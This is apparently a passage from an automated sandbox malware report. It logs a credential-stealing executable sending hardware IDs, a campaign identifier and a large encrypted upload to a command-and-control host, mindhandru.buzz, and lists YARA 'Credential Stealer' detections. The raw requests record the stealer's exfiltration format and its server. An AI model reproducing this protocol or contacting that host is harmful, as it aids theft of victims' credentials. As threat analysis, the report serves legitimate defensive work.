                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1636&min_rtt=1631&rtt_var=623&sent=20&recv=33&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21465&delivery_rate=1742243&cwnd=216&unsent_bytes=0&cid=d355e5902e7ef88b&ts=1082&x=0"
                                                                                                                2024-12-27 07:59:22 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                2024-12-27 07:59:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                5192.168.2.549728172.67.165.1854435632C:\Users\user\Desktop\AaEBZ7icLd.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-27 07:59:24 UTC280OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=M02EWWBEYB8UUNW6QO
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 1256
                                                                                                                Host: mindhandru.buzz
                                                                                                                2024-12-27 07:59:24 UTC1256OUTData Raw: 2d 2d 4d 30 32 45 57 57 42 45 59 42 38 55 55 4e 57 36 51 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 38 46 46 36 45 46 45 39 36 33 36 38 33 31 30 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4d 30 32 45 57 57 42 45 59 42 38 55 55 4e 57 36 51 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4d 30 32 45 57 57 42 45 59 42 38 55 55 4e 57 36 51 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f
                                                                                                                Data Ascii: --M02EWWBEYB8UUNW6QOContent-Disposition: form-data; name="hwid"18FF6EFE96368310BEBA0C6A975F1733--M02EWWBEYB8UUNW6QOContent-Disposition: form-data; name="pid"1--M02EWWBEYB8UUNW6QOContent-Disposition: form-data; name="lid"PsFKDg--pablo
                                                                                                                2024-12-27 07:59:25 UTC1132INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 27 Dec 2024 07:59:25 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=u6astk6bkjoj5t1q0n5th0qb4h; expires=Tue, 22 Apr 2025 01:46:03 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y0iChU78%2FeadZJO3X14xnKxwJVa0m1eHp%2BGxaYJenZk%2Fi6GSyRoceevivaMSu%2BV9Zc0Nd7968DL95yWgjRkYhCgM%2ByQlcEabt%2FKvasAP%2FSxGj2JPGdgq6cN5Y51uqRddwgM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f87c5630a8b41a6-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2474&min_rtt=2471&rtt_var=934&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2172&delivery_rate=1168000&cwnd=239&unsent_bytes=0&cid=42f62b15a88637ef&ts=800&x=0"
                                                                                                                2024-12-27 07:59:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                2024-12-27 07:59:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                6192.168.2.549736172.67.165.1854435632C:\Users\user\Desktop\AaEBZ7icLd.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-27 07:59:27 UTC283OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=5KSXFNFJUILJS228X71
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 569731
                                                                                                                Host: mindhandru.buzz
                                                                                                                2024-12-27 07:59:27 UTC15331OUTData Raw: 2d 2d 35 4b 53 58 46 4e 46 4a 55 49 4c 4a 53 32 32 38 58 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 38 46 46 36 45 46 45 39 36 33 36 38 33 31 30 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 35 4b 53 58 46 4e 46 4a 55 49 4c 4a 53 32 32 38 58 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 4b 53 58 46 4e 46 4a 55 49 4c 4a 53 32 32 38 58 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61
                                                                                                                Data Ascii: --5KSXFNFJUILJS228X71Content-Disposition: form-data; name="hwid"18FF6EFE96368310BEBA0C6A975F1733--5KSXFNFJUILJS228X71Content-Disposition: form-data; name="pid"1--5KSXFNFJUILJS228X71Content-Disposition: form-data; name="lid"PsFKDg--pa
                                                                                                                2024-12-27 07:59:27 UTC15331OUTData Raw: 34 4c 0c a0 6c aa b7 be 9d 2f 73 fd b8 28 08 b6 92 21 c6 fd 48 d0 01 d7 02 ee dd d0 e1 39 de 4d 51 ce 51 5e d0 fc ff b0 bc 1c 12 4d 80 e0 aa 14 fc 1b c0 ea f8 3f 07 4a 06 4a 20 2a af 1a c2 aa 29 46 03 4a 6b 33 67 07 23 00 fd d5 5c 55 b2 11 83 35 57 93 62 89 50 a6 9d 92 d6 42 c0 26 29 dd 3e 07 07 a2 82 37 3f a6 dc 25 ee 35 f9 40 13 d0 4e 46 87 ee e1 b8 39 33 a6 57 63 74 d0 6e 8f 82 19 72 d9 ea cc dc 35 b4 60 ed 2d c3 f4 96 f4 a2 b5 cc cf da a8 15 69 0f 86 0f fa a6 5d 37 8a 92 ba 9e d5 dd 27 d2 7a 5e b8 9c eb b3 aa 30 1c e7 3b 20 14 68 30 7f ac d3 7f ed af 98 f0 7b a9 e5 fb 60 0a 6c c4 07 54 26 9d 3b ad 26 a0 e9 d3 8c 93 84 45 51 f0 ad 04 c7 64 4b 0c 5b 3f 3d 11 54 22 67 0d 91 c6 1a ea be 24 b5 71 c6 0c 5d cb fe 79 1c e1 7f b9 25 39 d4 24 34 a4 8f e7 f4 5e
                                                                                                                Data Ascii: 4Ll/s(!H9MQQ^M?JJ *)FJk3g#\U5WbPB&)>7?%5@NF93Wctnr5`-i]7'z^0; h0{`lT&;&EQdK[?=T"g$q]y%9$4^
                                                                                                                2024-12-27 07:59:27 UTC15331OUTData Raw: d5 66 f5 79 86 d0 04 1c 98 e8 bb 7d d9 8a 7a 0c 14 c8 3e e1 95 0c 0f b9 c4 5d 90 78 36 b8 c0 56 f1 e9 26 af 45 07 ce d7 e1 06 d1 42 fa 4c ce ef b2 84 f2 ff 2c 5f df 95 2c 2f b8 06 f0 93 fe df 3d fe 19 10 b3 72 f8 d5 a6 37 a7 6f 55 e9 f4 2e 8a 20 63 90 dc 97 06 2a f5 2c c1 9d 66 bd 85 31 12 80 7b 96 d6 71 e9 fe 33 8e d5 cf 3f 6d 4f 5c 72 1c e7 14 af 9a 94 f9 34 f4 7b ae be d7 1a 98 ed d6 fc a0 d2 5f 6a 5a f7 79 d6 77 6e 02 0c 7b b0 0d 7e ee e1 4c fb b3 56 4d 5f 57 3a 9e 49 fb e5 19 78 db e1 28 a8 f2 30 c5 01 d6 0b 30 ff 36 07 02 dc 44 74 f0 ef 7b c1 27 c0 fc 00 e2 8e cf 83 c4 69 c0 58 45 33 f2 3e 6b 21 26 88 8c 62 dc 3d 41 fa bf c1 ac dc fb 24 45 da 17 1c 40 38 85 64 db 6e ce 29 d0 a3 44 55 e3 01 62 ab d7 76 cb 37 c9 25 43 35 cb db ab 06 95 aa e5 c0 72 0d
                                                                                                                Data Ascii: fy}z>]x6V&EBL,_,/=r7oU. c*,f1{q3?mO\r4{_jZywn{~LVM_W:Ix(006Dt{'iXE3>k!&b=A$E@8dn)DUbv7%C5r
                                                                                                                2024-12-27 07:59:27 UTC15331OUTData Raw: bf 75 67 2a f9 ef 77 7f 6f 6a 7c 3f 53 d5 b2 c7 8b 79 f9 4d 2b ff 8c 6c 91 4e 29 41 1b 4d 50 a5 f9 f5 27 01 9a 79 9a e8 8d 5f da 9e b9 7b bd e6 2f 50 44 d2 c5 aa ba 96 79 ba 9f e9 e7 85 fd 63 56 0c 57 2f ba 0d e3 55 87 74 15 5e 55 64 37 ef 7c 56 fb f7 a1 9b 8f d0 39 92 86 fe e0 bf 24 d2 46 dd 9b 7b 18 c2 62 91 cc 1a 44 df ab b6 87 af f2 d8 cd 1a af e3 4e 77 4e 1d f1 5a bc d3 62 4e eb 9d f8 27 eb 2e ec af 34 06 30 7a b3 c7 d9 7e 9e 76 6b 5e af cf fc 5d 86 07 b1 67 ed c2 a6 54 2a 2d 64 05 c7 55 df 79 4e 1e e5 48 66 96 9f 73 74 e8 41 57 b4 7d 7d c0 36 8d 17 ee b2 a6 8b b3 9a f7 c4 54 ff e5 6f f6 4b d4 b6 77 bf 3e 69 62 1b 83 41 a1 f8 04 34 29 99 98 37 45 bd 9c 60 07 8d e2 3b 0a 0a 88 1e ea 28 da 0d 0a 85 2a 1c 56 fb 8a 16 21 f9 37 c8 93 20 58 eb dc 39 9b b6
                                                                                                                Data Ascii: ug*woj|?SyM+lN)AMP'y_{/PDycVW/Ut^Ud7|V9$F{bDNwNZbN'.40z~vk^]gT*-dUyNHfstAW}}6ToKw>ibA4)7E`;(*V!7 X9
                                                                                                                2024-12-27 07:59:27 UTC15331OUTData Raw: 88 bf 95 42 7f 26 3b 18 22 96 8a 2f fe 0a 93 e5 f8 90 c7 37 c4 e3 f8 5a 4d fd 4a a2 0e d9 cb 16 fe 60 61 68 66 ef d8 80 78 8e 9c ff cf 09 8c ff 7d d0 03 dd 8f b8 f3 b2 31 7f e3 41 00 1a f4 b9 43 f3 27 b8 c0 14 2b 7f 05 a8 b6 2a 27 41 e2 bd 1f df de ae 38 02 cc 36 eb 8f a1 68 27 7e fe a4 5d 4e dc a8 0f ea 17 c2 0f 7f b8 6d a0 c3 72 53 e9 2e 65 e1 57 b4 74 2d 5e 97 77 ce 89 dd 12 e1 4b b1 04 78 fa c4 55 d8 09 df 20 4a 8f ff c8 9f de 8c 32 b4 19 cd 00 16 69 12 4b 97 e8 99 f9 80 13 48 6c bc 15 e6 10 dc bd d2 f3 75 95 64 4f 47 f7 a1 2a e2 c6 e4 24 77 09 98 d9 9f eb 82 82 b9 78 54 c1 9b 8f e6 13 d0 05 2e ec da 8b 9f 15 c9 23 99 9e 94 e6 c5 fc 36 87 6a 83 50 83 08 6a a2 08 de f3 78 7a 29 4b 09 1b 52 24 63 0d a5 bb 83 22 57 a7 f7 bf f9 63 49 d5 06 40 8f 56 f9 22
                                                                                                                Data Ascii: B&;"/7ZMJ`ahfx}1AC'+*'A86h'~]NmrS.eWt-^wKxU J2iKHludOG*$wxT.#6jPjxz)KR$c"WcI@V"
                                                                                                                2024-12-27 07:59:27 UTC15331OUTData Raw: 9f 3b e8 f7 8d 6e 9e 6e 41 b1 aa e4 b5 d0 5e 3c 6f 09 98 96 64 08 c9 75 b9 0d 8e 58 98 5f ab 04 54 9d 9d b8 7c a0 4f f8 57 94 ae 97 29 e7 8c de 1e 77 e8 e9 c2 7f 6e e6 fa 3b 40 bd 25 ab 91 30 83 89 43 ca a6 ca 45 b3 c4 89 d1 d7 8d 2d 46 15 84 26 c4 8a 70 2d 4d 4e 2a 1e 7d b3 a3 7e d1 e8 d5 61 a7 0d 7b c9 9e 0e 24 1e 65 28 f2 83 e9 a0 c9 a0 2e 8c 4a 9b 83 48 a3 96 d6 82 79 0a 55 47 cc 62 00 46 70 32 37 c9 0d 63 dd 65 94 8f d6 b8 2e 1f 92 a8 26 15 7c 65 d9 b0 d8 b9 91 7c ef b2 54 88 7b 48 54 0c bb d7 99 7b d9 68 85 65 44 8f fb b5 15 54 ca 97 20 77 8a e4 d1 d1 90 63 54 d6 8a a0 2f e9 f3 40 22 34 7a 9a 91 3f 46 84 83 3c 18 37 57 bb 5a d8 8f 17 04 d8 27 79 ee 11 01 d1 19 5c 9b 1f 14 72 28 75 c3 83 21 56 5f 99 96 27 ee 36 33 e6 0e e6 cf 14 44 1f 6b fb b3 9f 13
                                                                                                                Data Ascii: ;nnA^<oduX_T|OW)wn;@%0CE-F&p-MN*}~a{$e(.JHyUGbFp27ce.&|e|T{HT{heDT wcT/@"4z?F<7WZ'y\r(u!V_'63Dk
                                                                                                                2024-12-27 07:59:27 UTC15331OUTData Raw: 68 d5 b1 9e ad 8b 66 9c 90 e0 b5 6b 71 bb fc 0a ae e0 65 91 9f 7e b2 ab 0b fc df 15 b4 7e fd 56 bd 79 6b 20 62 c3 90 28 10 2e 2c 66 51 16 17 ff 7c e3 b9 ec 86 7a 24 ed 9f dc b7 53 8b 91 ea c6 3a 07 28 b4 bd 12 72 4f 4a 1b 5e 1b 87 85 ed 58 33 08 f8 db 23 31 0f 50 b9 0d cc f4 63 50 ce 29 f4 e2 f0 e1 ce 43 a0 3a d2 f6 f9 ff 5a 20 a4 fc 3d 70 a8 19 0d 1c b0 69 e3 9c bd d7 ff 1e 29 65 c3 f9 f0 48 9a b1 95 9f 02 61 b9 5b 7c c2 ce bf f1 f7 8b fc 62 d6 4c 8c 8e 07 ad 7b a1 ab 68 56 9c 22 7c 78 69 3a ca 59 08 a8 8e 6b 49 92 f2 4e d2 7f 10 99 0f 6d dd 93 b2 ca 41 bc 22 cc 11 1b 47 5f 57 4a ac 7b 54 2a 61 d7 7e 61 1e 22 64 44 a0 22 7d d7 c4 11 7d 4f 28 0e 2c f1 a7 5b dc a3 72 da c0 6f a3 f3 f0 83 d5 22 64 4a 76 bb 45 8c dd 5d 5e 15 f3 44 43 c9 7f 08 62 22 d2 d6 93
                                                                                                                Data Ascii: hfkqe~~Vyk b(.,fQ|z$S:(rOJ^X3#1PcP)C:Z =pi)eHa[|bL{hV"|xi:YkINmA"G_WJ{T*a~a"dD"}}O(,[ro"dJvE]^DCb"
                                                                                                                2024-12-27 07:59:27 UTC15331OUTData Raw: 81 20 85 37 bb 7a ef 52 84 01 ec 8b ad df 2d 3b 18 5d f7 e4 32 df d5 f7 cd b3 c8 7b c2 b1 0a ba 0d fb 8e 8f 3a ce 32 68 9a f0 78 f3 d7 f9 4f c8 7a 7c 99 37 12 16 3f 0d 79 7e d5 05 77 89 32 dc bb c4 08 47 5f 70 73 f8 88 af d9 53 9a 26 eb 49 4c ee 3e 2e 47 c5 20 3f 04 37 5c b9 30 52 7f 6a 3d f1 d9 9d 2c f5 cd bb 9f 0c 16 d8 7f be 21 e8 fa 80 71 b6 44 78 8f 1e 58 67 73 e9 f1 c2 58 81 ba cf 3f 67 37 01 8c c9 e8 79 8b ba 64 5a cf e6 84 35 0c af 4e 97 68 82 0a 9e 37 74 18 01 3f 57 fc 33 39 b1 10 eb 31 ff a0 b9 4c c8 50 cc b0 24 81 fb 9f ff a7 f6 00 87 e9 f1 af 7a 60 94 e8 0a 2d fd a4 24 8d b6 3b c3 b5 c7 0d 15 ef 92 7d 53 71 18 2d fb 0d b6 7c 7a 02 b7 9d 05 ab 48 51 9c 47 3d eb 66 f9 49 e2 bc e9 c5 a8 c1 90 e3 e6 1b 98 d8 52 be 87 8d 42 f3 a3 98 6a 36 4c 8a 8b
                                                                                                                Data Ascii: 7zR-;]2{:2hxOz|7?y~w2G_psS&IL>.G ?7\0Rj=,!qDxXgsX?g7ydZ5Nh7t?W391LP$z`-$;}Sq-|zHQG=fIRBj6L
                                                                                                                2024-12-27 07:59:27 UTC15331OUTData Raw: 86 a4 23 34 d3 fa 68 01 55 0e 25 8c 42 ac f8 83 96 1a 9f 27 b1 88 19 0d 34 fb be 37 e5 a3 4c 1a 82 85 59 7f 40 fa b3 60 05 80 61 9e 6f 4c e3 8a 27 81 ea 01 49 52 1c a6 70 2e 29 8f c4 cd 35 b7 5d 10 19 ca cb 4f 47 d2 2f 57 4b b5 27 1f 39 19 2b 26 45 49 5e c0 ad e3 7a b3 f6 ca e8 d4 f2 de cc ac 89 e5 c3 45 d1 a5 bf ec a5 67 11 2c 4d c8 6e 09 b6 a6 bf 93 3a 1c 5f 45 cd 18 ba 9f d2 60 21 d6 84 12 a9 64 db c6 99 d8 0d c0 94 e4 35 d7 e4 85 4e 9f 94 ac e7 d4 43 27 d4 84 ee 1f 69 cf 2a 38 53 83 b4 e6 b7 62 3c 60 ea e8 aa fc f2 79 ab 74 c3 bb 46 44 f1 30 75 fd 02 3e 92 d0 cb 60 ce 4d bf 8f c4 f6 72 f6 8f 21 eb 71 28 29 cd 0d d3 dd ab 2a 41 fd 14 b5 16 76 be 1d 4d 02 86 3a 10 e7 26 fd 6f ff bf 94 33 c0 78 60 ff fa 55 83 e4 89 e2 33 db af 31 80 73 fb 18 63 10 0c cb
                                                                                                                Data Ascii: #4hU%B'47LY@`aoL'IRp.)5]OG/WK'9+&EI^zEg,Mn:_E`!d5NC'i*8Sb<`ytFD0u>`Mr!q()*AvM:&o3x`U31sc
                                                                                                                2024-12-27 07:59:27 UTC15331OUTData Raw: 30 c2 4e a8 85 1a 6a 81 5d 7f 3f 6d f7 d4 1a d7 d6 a4 8b b1 91 9e 79 86 bf e0 0c 44 8c 31 2e a2 85 3d 74 e0 72 81 03 08 0b b7 8e 24 b7 3d 79 40 5a 55 b4 83 bd f8 cb 86 e3 a4 82 1c 6f af 7e 13 50 43 20 bb ad 18 8a ee 2c 0c 93 43 7d b1 4c f4 fa 98 7a 53 d8 c7 f1 57 d7 0b 9c a1 74 07 17 25 31 17 98 e2 24 33 6f de 1b d5 a4 7a b5 3a 3c 38 9a 7d 48 2e d6 27 1a 10 d6 d4 c7 12 bc b6 ac 87 6a 5e f3 a7 fe 71 1e a4 c6 82 ba 3f 59 2a 34 c2 f7 b8 78 c3 50 c3 72 96 9f 4c 1b 43 f2 ac a3 a9 61 30 2e 23 cd 07 37 3d c4 60 4d ae 9e 6f c2 41 20 7e de e7 cc bf b2 d9 5b 36 07 bf 6e e1 c1 4f e1 ec b9 3a ad 83 27 b3 71 8c 46 79 ba 74 2a e2 cb 73 41 b2 03 39 e6 c9 48 d4 c6 6e 0a 8e 2f a6 9c 75 50 e6 ef e0 70 52 26 9e 15 25 f6 08 0d dc fa 17 97 60 a3 72 ee a2 d8 6b 4f f2 93 c8 2e
                                                                                                                Data Ascii: 0Nj]?myD1.=tr$=y@ZUo~PC ,C}LzSWt%1$3oz:<8}H.'j^q?Y*4xPrLCa0.#7=`MoA ~[6nO:'qFyt*sA9Hn/uPpR&%`rkO.
                                                                                                                2024-12-27 07:59:29 UTC1135INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 27 Dec 2024 07:59:29 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=mdcjdcpvn6oo0m5ijkmpdbs0tg; expires=Tue, 22 Apr 2025 01:46:08 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e1E415mwhXvVMNHmGHWoZyw%2F4dfERkUink9ZxZtUGf6zDxRB%2FR6czzwR1QXDX%2F4z0njaz1AsUo8skYCUn%2Fs7%2BFhqngNdawi88udQur50TEK6jU0uIiDm5MTn3LZXDAgpheI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f87c573392943f7-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1557&rtt_var=598&sent=356&recv=594&lost=0&retrans=0&sent_bytes=2836&recv_bytes=572278&delivery_rate=1808049&cwnd=213&unsent_bytes=0&cid=daa59a3c67f4c1da&ts=2456&x=0"


                                                                                                                Statistics

                                                                                                                CPU Usage

                                                                                                                Click to jump to process

                                                                                                                Memory Usage

                                                                                                                Click to jump to process

                                                                                                                High Level Behavior Distribution

                                                                                                                Click to dive into process behavior distribution

                                                                                                                System Behavior

                                                                                                                General

                                                                                                                Target ID:0
                                                                                                                Start time:02:59:07
                                                                                                                Start date:27/12/2024
                                                                                                                Path:C:\Users\user\Desktop\AaEBZ7icLd.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\AaEBZ7icLd.exe"
                                                                                                                Imagebase:0x3e0000
                                                                                                                File size:1'883'648 bytes
                                                                                                                MD5 hash:52135372423D0E2A9E1A9C11C188DF25
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2277706743.0000000001084000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2277010991.0000000001084000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2279207879.0000000001084000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2277354845.0000000001084000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2278490614.0000000001084000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2279704777.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2278839639.0000000001084000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2276687938.0000000001084000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2276143171.0000000001084000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2279332488.0000000001084000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2275790023.0000000001083000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2278178086.0000000001084000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Disassembly

                                                                                                                No disassembly